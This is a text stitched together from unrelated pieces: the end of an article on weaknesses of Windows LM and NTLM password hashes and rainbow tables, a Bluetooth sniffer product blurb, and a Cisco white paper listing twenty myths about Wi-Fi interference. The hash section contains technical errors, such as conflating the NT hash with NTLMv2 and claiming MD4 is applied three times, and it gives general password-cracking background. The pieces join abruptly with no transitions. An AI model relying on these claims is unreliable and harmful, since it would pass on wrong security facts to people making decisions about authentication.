Perhaps the biggest weakness in the LM hash is in the creation of the DES keys. In this process, a user supplied password is automatically converted to all uppercase, padded to fourteen characters (this is the max length for an LM hashed password), and split into two seven character halves. Consider that there are 95 to the power of 14different possible passwords made up of 14 printable ASCII characters, this decreases to 95 to the power of 7possible passwords when split into a 7 character half, and then decreases to 69 to the power of 7 possible passwords when you are only allowed uppercase ASCII characters. Essentially, this makes the use of varying character cases and increased password length nearly useless when the password is stored as an LM hash, which makes LM passwords incredibly vulnerable to brute force cracking attempts.

NTLMv2 Password Hashes

NT LAN Manager (NTLM) is the Microsoft authentication protocol that was created to be the successor of LM. Eventually enhanced, NTLMv2 was accepted as the new authentication method of choice and implemented with Windows NT 4.

The creation of an NTLMv2 hash (henceforth referred to as the NT hash) is actually a much simpler process in terms of what the operating system actually does, and relies on the MD4 hashing algorithm to create the hash based upon a series of mathematical calculations. The MD4 algorithm is used three times in order to produce the NT hash. In practice, the password “PassWord123” would be represented as an MD4 hash with “94354877D5B87105D7FEC0F3BF500B33”.

Figure 2: A password being transformed into an NTLMv2 hash

MD4 is considered to be significantly stronger than DES as it allows for longer password lengths, it allows for distinction between uppercase and lowercase letters and it does not split the password into smaller, easier to crack chunks.

Perhaps the biggest complaint with NTLMv2 created hashes is that Windows does not utilize a technique called salting. Salting is a technique in which a random number is generated in order to compute the hash for the password. This means that the same password could have two completely different hash values, which would be ideal.

With this being the case, it is possible for a user to generate what are called rainbow tables. Rainbow tables are not just coffee tables painted with bright colors; they are actually tables containing every single hash value for every possible password possibility up to a certain number of characters. Using a rainbow table, you can simply take the hash value you have extracted from the target computer and search for it. Once it is found in the table, you will have the password. As you can imagine, a rainbow table for even a small number of characters can grow to be very large, meaning that their generation, storage, and indexing can be quite a task.

Conclusion

In the first part of this article we have examined password hashes and the mechanisms Windows utilizes to create and store these values. We’ve also touched upon the weaknesses of each method and possible avenues that can be used to crack those passwords. In the follow-up to this article we will actually step through the process of extracting and cracking these hashes to demonstrate their weaknesses. Once demonstrated I will provide tips for providing additional layers of security and creating a properly strengthened password.

Bluetooth Security seems to be very good compared to 802.11 problems. But most of the Bluetooth Security is based on the PIN you have to enter during pairing two devices or on the link key, which is a result of it. In addition,Bluetooth uses much more channels and hops frequently within the spectrum, which makes Analyzing a real pain. Sniffing raw communication without being paired is until now only available to rich companies or individuals which could buy one of the over-priced Bluetooth Sniffers. When i say High-Priced i talk about 10′000 US$.

Frontline is one of the few Bluetooth Sniffer manufacturers and they sell their application together with a special Bluetooth sniffer ComProbe / dongle. Here are some marketing highlights from their FTS4BT product website:

Supports EDR (Enhanced Data Rate): FTS4BT is the only analyzer currently on the market to support Bluetooth v2.0 EDR.

Finger-sized Bluetooth ComProbe: Air sniffing hardware is incredibly portable and requires no power.

Synchronized air and HCI sniffing: FTS4BT provides multiple points of observation, speeding up debug time.

Real-time debugging: FTS4BT captures, decodes, filters and displays data, and detects protocol errors simultaneously, all live and in real-time.

Decodes all Bluetooth protocols and most profiles. Quick release of new profiles to keep pace with changing Bluetooth specifications.

Extract Audio into WAV files for playback and analysis.

Includes Framedecoder for rapid development and seamless integration of HCI Vendor Extensions and other custom protocol implementations.

This Frontline technology is how we meet Bluetooth challenges

The growing ubiquity of wireless devices combined with the advent of mobility applications requires businesses to be diligent in managing inference throughout their deployments. The many wireless technologies and commonplace electric devices already in use and newly emerging impede wireless performance.

RF interference can be a major inhibitor to wireless performance, creating security vulnerabilities and wireless network instability.

This paper exposes the top 20 most pervasive myths around wireless interference.

Myth #1: “The only interference problems are from other 802.11 networks.”

There are a tremendous number of 802.11 devices out there. It is true that the other 802.11 networks can cause interference with your network. This type of interference is known as co-channel and adjacent channel interference. But since other 802.11 devices follow the same protocol, they tend to work cooperatively-that is, two access points on the same channel will share the channel capacity.
In reality, the many other types of devices emitting in the unlicensed band dwarf the number of 802.11 devices. These devices include microwave ovens, cordless phones, Bluetooth devices, wireless video cameras, outdoor microwave links, wireless game controllers, Zigbee devices, fluorescent lights, WiMAX, and so on. Even bad electrical connections can cause broad RF spectrum emissions. These non-802.11 types of interference typically don’t work cooperatively with 802.11 devices, and can cause significant loss of throughput. In addition, they can cause secondary effects such as rate back-off, in which retransmissions caused by interference trick the 802.11 devices into thinking that they should use lower data rates than appropriate.
Summary: The unlicensed band is an experiment by the FCC in unregulated spectrum sharing. The experiment has been a great success so far, but there are significant challenges posed by RF interference that need to be given proper attention.
Myth #2: “My network seems to be working, so interference must not be a problem.”

The 802.11 protocol is designed to be somewhat resilient to interference. When an 802.11 device senses an interference burst occurring before it has started its own transmission, it will hold off transmission until the interference burst is finished. If the interference burst starts in the middle of an ongoing 802.11 transmission (and results in the packet not being received properly), the lack of an acknowledgement packet will cause the transmitter to resend the packet. In the end, the packets generally get through. The result of all these hold-offs and retransmissions, however, is that the throughput and capacity of your wireless network are significantly impacted.
For example, microwave ovens emit interference on a 50 percent duty cycle (as they cycle on and off with the 60-Hz AC power). This means that a microwave oven operating at the same frequency as one of your 802.11 access points can reduce the effective throughput and capacity of your access by 50 percent. So, if your access point was designed to achieve 24 Mbps, it may now be reduced to 12 Mbps in the vicinity of the microwave when it operates. If your only application on the WLAN is convenience data networking (for example, Web surfing), this loss of throughput may not be immediately obvious. But as you add capacity and latency-sensitive applications such as voice over Wi-Fi your network, controlling the impact of interference will become a critical issue.
Summary: Interference is out there. It’s just a silent killer thus far.
Myth #3: “I did an RF sweep before deployment. So I found all the interference sources.”

One of the most troubling issues about interference is that it is often intermittent in nature. The interference may occur only at certain times of day-for example, when someone is operating a device such as a cordless headset-or on certain days of the week. So, unless an initial sweep is done for an extended time, it’s very easy to miss sources of interference. And even if the sweep was extensive (for example, making measurement in each area for 24 hours), things change over time. It’s very easy for someone to introduce one of the many devices that operate in the unlicensed band into your environment. No amount of periodic sweeping can truly guarantee that you have an interference-free environment.
Summary: You can’t sweep away the interference problem. Microwave ovens, cordless phones, Bluetooth devices, wireless video cameras, outdoor microwave links, wireless game controllers, Zigbee devices, fluorescent lights, WiMAX devices, and even bad electrical connections-all these things can cause broad RF spectrum emissions. These non-802.11 types of interference typically don’t work cooperatively with 802.11 devices.
Myth #4: “My infrastructure equipment automatically detects interference.”

Some of the newer, switch-based WLAN infrastructure products provide a level of RF interference management. With their 802.11 chipsets, these solutions detect the presence of non-802.11 signals. And in response to detection, they can change the 802.11 channel of the APs in the area of the interference. An issue with this approach is that it doesn’t solve many of the problems that are out there. Some interfering devices-for example, Bluetooth devices, cordless phones, 802.11FH devices, jamming emissions) are broadband, so it’s not possible to change channels away from them: they are everywhere in the band. And even for devices that operate on a static frequency, it can be challenging to manage channel assignments in a large, cell-based network. In the end, it’s critical that you be able to analyze the source of interference-that is, identify what the device is and where it is located-in order to determine the best course of action to handle the interference. In many cases, this “best action” will be removing the device from the premises. In other cases, the response may be to move or shield the device from impacting the network.
Summary: Simple, automated-response-to-interference products are helpful, but they aren’t a substitute for understanding of the underlying problem.
Myth #5: “I can overcome interference by having a high density of access points.”

The inexpensive nature of 802.11 access points makes it tempting to deploy them with very high density. For example, some networks are being deployed with an AP in every room. This type of deployment has the benefit of greatly increasing the capacity of the network by allowing “spatial reuse” of the spectrum. It seems intuitive that by having more APs spread around, it’s more likely that a client will be able to operate successfully even when interference is present.
Unfortunately, when you deploy a dense network of access points, it’s necessary to reduce the transmit signal power of each of the access points. If you don’t reduce the power, the access points generate interference to each other, a phenomenon known as co-channel interference. The reduction in the transmit power of the access point exactly offsets the potential benefit of interference immunity. So in the end, the interference immunity of a network with a dense deployment of access points is not significantly better than that of a less dense deployment.
Summary: It’s reasonable to over-design your network for capacity, but a high density of access points is no panacea for interference.
Myth #6: “I can analyze interference problems with my packet sniffer.”

802.11 packet sniffer products suffer from the same problem as WLAN infrastructure equipment: they can see only what the 802.11 chips tell them. They can tell you about secondary indicators of interference, such as increased retransmissions and lower data rates, but they can’t analyze interference problems, determine the cause of the interference, and help you find where the interfering device is located.
A second problem with the data from 802.11 chips is that power measurements are typically uncalibrated. This means that the data you receive from an 802.11 chip about the signal strength of an access point (or other device) can usually not be expressed reliably in absolute dBm units. As a result, it is very difficult to put meaning on the numbers that packet sniffer devices report.
Summary: You need the right tool for analyzing interference. In the end, it’s critical that you be able to analyze the source of interference in order to determine the best course of action to handle the interference. In many cases, the best action will be removing the device from the premises.
Myth #7: “I have a wireless policy that doesn’t allow interfering devices into the premises.”

Having a wireless policy is a good first step in tackling the interference problem. But no policy is effective without enforcement. One of the great attributes of unlicensed band wireless devices is that they are inexpensive and widely available. As a result, it’s very easy for employees to purchase these devices and bring them to work. In many cases, these employees are not even aware that a particular device may cause interference with your wireless network. And some devices like cordless headsets and microwave ovens may be a necessary part of your business, so they can’t be completely disallowed.
Summary: You have to expect that interfering devices will sneak onto your premises.
Myth #8: “There is no interference at 5 GHz.”

It is generally true that fewer devices currently operating at 5 GHz are causing interference as compared to 2.4-GHz devices. But this will change over time. Just as everyone moved from 900 MHz to 2.4 GHz to avoid interference, the “band jumping” effect will catch up with 5 GHz. Some devices that already exist at 5 GHz include cordless phones, radar, perimeter sensors, and digital satellite.
Summary: You can run, but you can’t hide.
Myth #9: “I’ll hire a consultant to solve any interference problems I run into.”

If you have been running a WLAN for some time, you will know that there are frequent instances where your network doesn’t operate perfectly. Without having your own visibility into interference, you are left to guess about whether or not interference is the problem. Lack of visibility is an issue for IT personnel, especially when the CEO is asking why he was having trouble yesterday connecting in the conference room. And beyond the issues of control, it’s expensive and time-consuming to bring in a consultant to debug these kinds of problems. A single visit and trip report can cost on the order of US $5000 to $10,000.
Summary: You can’t afford to rely on a third party to debug your network.
Myth #10: “I give up. RF is impossible to understand.”

Don’t despair. Tools are now available that make RF easier to understand, even for those who consider themselves wired network specialists, not wireless experts. For example, Cisco® Spectrum Expert Wi-Fi classifies the sources of your interference, so you don’t need to read the “wiggly lines.” And after we’ve identified the interference, we help you find and eliminate it.
Summary: The cavalry is here!
Myth #11: “Wi-Fi interference doesn’t happen very often.”

There is a growing body of evidence that points to the fact that Wi-Fi interference is an extremely common and troublesome issue. Here are a few recent examples:
• The technical support engineers at a major Wi-Fi infrastructure vendor reported to Cisco that in a recent service call to a major customer they found almost 20 sources of interference, contributing to over 50 percent of the problems on the customer’s Wi-Fi network.

• The manager of a large group of outsourced wireless service representatives stated to Cisco that “one out of every three Wi-Fi problems our service technicians get called out for is related to interference.”

• In a recent survey of 300 of their customers, a major Wi-Fi tools provider reported that “troubleshooting interference won `top honors’ as the biggest challenge in managing a Wi-Fi network.”

• Jupiter Research reports 67 percent of all residential Wi-Fi problems are linked to interfering devices, such as cordless phones, baby monitors, and microwave ovens.

Summary: There’s no point burying your head in the sand: Wi-Fi interference happens.
Myth #12: “I should look for interference only after ruling out other problem sources.”

In any networking system, it’s critical that the physical layer is solid. When the physical layer is not operating properly, the higher protocol layers tend to operate in inefficient and sometimes confusing ways. For this reason, it always makes sense to verify your physical layer first before going on a wild-goose chase looking higher layer problems.
As an analogy, when you hook your computer up to an Ethernet cable and the network does not appear to be working, your first diagnostic step is to look at the lights on the side of your Ethernet adapter. If the lights are not on, there is no point looking for a subtle network configuration problem: you simply don’t have physical layer connectivity.
The potential for physical layer problems with Wi-Fi is much worse than with Ethernet. With an Ethernet cable, you worry about the physical-layer connectivity issue only the first time you plug in the cable. If the connection was working that first day, it’s reasonable to expect it will keep working day after day. But in the RF world, the quality of the physical connection can change hour by hour, as people introduce other devices or obstructions into the environment.
Summary: Avoid wasting your time. Fix your RF physical layer first.
Myth #13: “There’s nothing I can do about interference if I find it.”

The most common cure for interference is simply to replace or remove the offending interference device. For instance, you might replace an old leaky microwave oven or a 2.4-GHz cordless headset used by the receptionist with a different model that operates in a non-Wi-Fi frequency band. Many times interference is caused unwittingly by well-intentioned employees. One Wi-Fi administrator found an employee who sat with his back to his door, and had brought in a wireless camera so he could see behind him. Unfortunately, it operated at 2.4GHz. In this case, a policy was created to ban these types of devices on the campus.
Another solution is to work around the interference device by moving the affected access point, or changing its operating channel to a frequency that is not impacted by the interfering device. This is simple once you understand the location and frequency parameters of the interfering device. Note that because some devices frequency-hop (for example, Bluetooth devices) it’s not always possible to change channels and eliminate the interference.
A final cure is to move or shield the offending device. For example, in a hospital, a piece of equipment that causes RF interference might be isolated to a particular room where Wi-Fi network access is not critical. If that’s not possible, adding electromagnetic interference (EMI) shielding can limit propagation of the interference to a small area. You can implement shielding with grounded mesh or foils in the walls (essentially Faraday cages) or with insulating foams or paints.
Summary: There’s always a cure for interference, but you need to know what’s ailing you.
Myth #14: “There are just a few easy-to-find devices that can interfere with my Wi-Fi.”

With the huge proliferation of wireless devices in the unlicensed band, it is no longer obvious what might be a source of interference-wireless links are now embedded in watches, shoes, MP3 players, and many other tiny consumer devices.
In some cases, previously benign devices have been updated with RF technology. Motion detectors, which appear in many offices for lighting control, are a good example. A new breed of hybrid motion detectors uses a combination of passive infrared sensor (PIR) and 2.4-GHz radar to detect motion. These devices, which look identical to their benign predecessors, generate significant interference that can disrupt your Wi-Fi network.
Unintentional emitters are also hard to find. A defective ballast on a fluorescent light fixture can generate broadband RF interference that can impact Wi-Fi. This is impossible to identify by simply looking at the device. “Hidden devices” are becoming more common as well. We have seen numerous instances where a security group has hidden wireless cameras-unbeknownst to the networking group-not realizing that they are jamming the Wi-Fi network.
Summary: You need the right tool to find interference fast, and it’s not a magnifying glass.
Myth #15: “When interference occurs, the impact on data is typically minor.”

The impact of a single interferer on data throughput (or data capacity) of your Wi-Fi network can be astounding.
There are three major factors that determine the impact of an interference device:
• Output power. The greater the output power, the larger the physical “zone of interference” the device creates.

• Signal behavior with respect to time. Analog devices, such as some video cameras and older cordless phones, have a constant always-on signal. Digital devices, such as digital cordless phones, tend to “burst” on and off. Different devices have varying durations of on-time and off-time. In general, the greater the percentage of time that the signal is “on” and the more frequently it bursts, the greater the impact it will have on throughput.

• Signal behavior with respect to frequency. Some devices operate on a single frequency, and impact specific Wi-Fi channels. Other devices hop from frequency to frequency and impact every channel but to a lesser degree. Some devices, such as microwave ovens and jammers, sweep quickly across the frequency spectrum, causing brief but serious interruptions on many frequencies.

A recent study undertaken by Farpoint Research measured the impact of various interference devices on the data throughput of Wi-Fi. At 25 feet from the AP or client, a microwave oven was found to degrade data throughput by 64 percent, a frequency-hopping phone degraded throughput by 19 percent, and an analog phone and video camera both degraded throughput by 100 percent (in other words, no ability to connect).
Summary: Interference can really take the zip out of your Wi-Fi data throughput.
Myth #16 “Voice data rates are low, so the impact of interference on voice over Wi-Fi should be minimal.”

With modern voice coding, the data rate of an individual voice call is on the order of 8 Kbps. Compared to the maximum throughput of a Wi-Fi network, this seems like a trivial amount, and it therefore seems reasonable to expect that a Wi-Fi access point can handle many concurrent voice-over-IP (VoIP) calls.
Unfortunately, many factors reduce the number of calls that an access point can handle. First, there is significant VoIP protocol-level overhead, which increases the typical stream to 100 Kbps. Then there is additional protocol overhead imposed by Wi-Fi. Second, voice traffic is very sensitive to jitter and delay, requiring extra capacity in the network to minimize congestion. The typical number of voice calls that vendors advertise they can handle with a Wi-Fi access point is only 15. When interference is introduced, the number of calls that can be handled drops from there.
In addition, small amounts of interference seriously impact voice-over-Wi-Fi voice quality. A recent study undertaken by Farpoint Research measured the impact of various interference devices on the mean opinion score (MOS) for voice-over-Wi-Fi calls, and found the voice quality falling to unacceptable levels when a microwave, cordless phone, video camera, or co-channel Wi-Fi device was within 25 feet of the access point or phone. And perhaps more importantly, interference creates coverage holes where phone calls will be dropped. An in-house study showed that the effective range of a VoWi-Fi phone drops by 50 percent with an interference device (cordless phone or video camera) at a distance of 75 feet from the access point. This 50 percent reduction in the range of your phones would likely result in coverage holes over 75 percent of your floor space.
Summary: Can you hear me now? Voice over Wi-Fi and interference don’t mix.
Myth #17: “Interference is a performance problem, but not a security risk.”

If an Internet worm got through your corporate firewall and was using up 50 percent of your corporate network bandwidth as it spread from machine to machine, would you consider that a security or a performance concern? The point here is that anything that impacts mission-critical corporate IT systems is a security concern. As your corporate Wi-Fi network becomes more and more mission-critical, any possible interference device-whether the interference is malicious, as in the case of a jammer, or accidental-must be viewed as a potential security issue. In addition to RF denial of service, there are several other risks related to non-Wi-Fi RF devices, including:
• Multiprotocol devices. Wi-Fi networks are typically locked down with secure access controls, but devices that run on non-Wi-Fi networks, such as Bluetooth devices, are not. A notebook computer with Wi-Fi and Bluetooth connectivity may act as bridge, allowing an intruding device onto the corporate LAN or WLAN. Preventing accidental bridging between insecure networks and the corporate networks requires: 1) client-based tools that control configuration of wireless network interfaces, and 2) RF monitoring that watches for suspicious non-Wi-Fi activity indicating possible bridging.

• Non-Wi-Fi rogues. Most enterprises implement some form of Wi-Fi rogue access point detection to find unauthorized (and frequently unsecured) access points on the corporate network. But there are non-Wi-Fi devices (such as Bluetooth access points) that can open up a similar security hole. Like Wi-Fi rogues, these devices must be detected and eliminated.

• Leakage of sensitive data. Certain non-Wi-Fi devices such as cameras and cordless phones can be used to carry sensitive data out of a restricted area, bypassing corporate security policies. When this is a concern, a zone of restricted wireless operation should be established, and that zone should be enforced through monitoring of the spectrum for unauthorized devices.

Summary: RF security doesn’t stop with Wi-Fi. Do you know who is using your spectrum?
Myth #18: “802.11n and antenna systems will work around any interference issues.”

Systems that use multiple antennas or smart antennas are able to increase immunity to interference by boosting the desired signal seen at a receiver. When the desired signal is stronger, the ratio of that signal to interference (referred to as signal-to-noise ratio or SNR) is also improved. Effectively, this reduces the zone of interference associated with a particular interference device to a smaller area. But the gain achieved by a smart antenna system is typically only on the order of 10 dB of enhanced signal power. This means that the range of interference might be shrunk by a factor of 2 over a traditional antenna system, but even then the interference problem is far from solved. For example, if a device would have previously caused problems at a distance of 80 feet from the receiver, it will still cause problems up to 40 feet from the receiver. Thus you would have 5000 square feet of floor space where the interference is still a problem!
Summary: Antennas are a pain reliever, but far from a cure.
Myth #19: “My site survey tool can be used to find interference problems.”

A standard Wi-Fi site survey tool is designed to measure Wi-Fi coverage. It uses a Wi-Fi chipset to measure the signal strength of access points as you move around the building. Unfortunately, Wi-Fi chips are designed to see Wi-Fi signals only, and can’t tell you much about interference from other non-Wi-Fi devices. (This is the same limitation experienced when using a Wi-Fi packet analysis tool). A Wi-Fi site survey tool might indicate a general area where a non-Wi-Fi signal was observed. But the tool can’t help you determine the nature of the interference, the type of device causing it, or where the device is located. So you are left without a solution. You really need an RF-level tool to diagnose interference problems. The good news is that a few of the next-generation Wi-Fi site survey tools are being more closely integrated with RF-level tools in order to implement a complete solution.
Summary: Site survey tools measure coverage, but don’t solve your RF needs.
Myth #20: “RF analysis tools are too bulky and too expensive.”

Many RF analysis tools (such as large and expensive spectrum analyzers) are not enterprise friendly.
But Cisco’s RF spectrum analysis tools are designed to fit both your desired form factor (small cards that plug into your laptop) and your IT budget. And to make things even better, Cisco’s spectrum intelligence solutions makes being a RF expert unnecessary.
Summary: Learn more about Cisco’s Spectrum Intelligence solutions at: http://www.cisco.com/en/US/partner/products/ps9393/index.html
Conclusion

There are many myths about the obstacles to high-performing and reliable WLAN services. A misunderstanding of the nature Wi-Fi interference underlies many of these myths, as does the belief that better visibility into RF spectrum is a difficult and costly proposition. In fact, the idea that RF spectrum visibility is prohibitively difficult and expensive to achieve may be the most malicious myth of all.
Cisco Unified Wireless Network supports real-time spectrum intelligence for Wi-Fi networks. industry-leading solution detects, classifies, and locates devices causing RF interference in the unlicensed 2.4-GHz and 5-GHz bands.
For information on ways to manage wireless interference, visit the Cisco RF solution page at: http://www.cisco.com/en/US/partn … utions_package.html